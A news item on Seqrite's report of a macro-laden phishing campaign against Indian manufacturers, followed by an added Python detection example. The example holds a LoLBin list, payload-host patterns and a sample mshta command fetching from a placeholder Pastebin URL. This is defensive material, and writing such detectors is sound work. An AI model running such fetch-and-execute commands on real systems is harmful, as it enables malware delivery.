Seqrite, a specialist provider of endpoint security and data protection solutions, has detected a new MalSpam (malicious spam) campaign, targeting the manufacturing and export sectors in India, according to a company release.

Seqrite researchers noted that malware actors are leveraging multiple sophisticated techniques in a campaign to bypass traditional defence mechanisms.

However, the cyber-security company claimed it is successfully detecting and blocking any such attempts using its patented Signatureless and Signature-based detection technology.

According to Seqrite, some of the common Remote Access Tools used by attackers are Agent Tesla, Remcos RAT, and NanoCore RAT.

Researchers at Seqrite have been following the tracks of these campaigns since April 2020 and have found that attackers don’t restrict themselves to a single geography or vertical, the company mentioned.

They also noticed that similar earlier campaigns had targeted a variety of organisations, including government-run ones.

The attackers generally use publicly available services such as Pastebin and Bitly to host their payloads, since traffic to legitimate services tends to go unflagged, Seqrite noted.

How does the attack begin?

The attack begins in the form of a phishing email sent to a genuine user. This contains MS Office PowerPoint files with a malicious Visual Basic for Applications (VBA) macro.

Cyber attackers use VBA programming in Microsoft Office macros as a medium to spread viruses, worms, and other forms of malware on a computer system.

After execution, the malware abuses legitimate software already present on the system to download the malicious payload from Pastebin and continue the infection.

Techniques used in the attack campaign

LoLBins or living-off-the-land binaries: Attackers abuse these built-in legitimate tools for malicious objectives as security products usually whitelist them.

Hosting payloads on the legitimate hosting service Pastebin: By hosting the malicious payload on Pastebin, a web-based platform widely used for sharing source code, attackers can bypass network security controls, enter the computer system and steal critical data.

Bypass Anti-Malware Scan Interface (AMSI): Cyber attackers use a variety of techniques to bypass AMSI and potential detection by security products.

In-memory payload execution (file-less technique): A file-less infection loads malicious code directly into the system's memory and evades anti-virus protection, as there is no file to be scanned and analysed.
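As an added, defender-side example that is not part of Seqrite's report: a small Python check over constructed process-creation events, flagging the chain the article describes, an Office process spawning a living-off-the-land binary that fetches from Pastebin or Bitly. Field names and the LoLBin list are assumptions, loosely modelled on Sysmon's process-creation fields.

```python
"""Flag Office-spawned LoLBins fetching from paste/URL-shortener services.
Added example; events are constructed, field names (ParentImage, Image,
CommandLine) are assumed Sysmon-style names, not real telemetry."""
import re
from urllib.parse import urlparse

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
# LoLBins commonly abused as downloaders/launchers; illustrative list.
LOLBINS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe"}
# Legitimate services the article names as payload hosts.
PAYLOAD_HOSTS = {"pastebin.com", "bit.ly"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def suspicious_hosts(cmdline):
    """Hosts in the command line that match a known payload-hosting service."""
    hosts = set()
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in PAYLOAD_HOSTS):
            hosts.add(host)
    return hosts

def classify(event):
    """Return the reasons an event is suspicious ([] means no finding)."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    reasons = []
    if parent in OFFICE_PARENTS and child in LOLBINS:
        reasons.append(f"office_spawned_lolbin:{parent}->{child}")
    hosts = suspicious_hosts(event.get("CommandLine", ""))
    if hosts and child in LOLBINS:
        reasons.append("lolbin_fetch_from:" + ",".join(sorted(hosts)))
    return reasons

# Constructed sample events (placeholder paste id, not a real indicator).
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://pastebin.com/raw/PLACEHOLDER"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
]

def scan(events=EVENTS):
    """Return (command line, reasons) for every event with a finding."""
    hits = [(e["CommandLine"], classify(e)) for e in events]
    return [h for h in hits if h[1]]
```

The first constructed event trips both conditions; the second, a plain PowerShell run from Explorer, produces no finding, which is the false-positive case a rule like this has to stay quiet on.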

Timely detection and blocking of such attack campaigns is essential for maintaining the integrity of, and trust in, businesses.

Seqrite suggested users exercise ample caution and avoid opening attachments and clicking on web links in unsolicited emails.

Businesses should consider disabling macros, keeping their operating systems (OS) updated, and having a full-fledged security solution installed on all devices.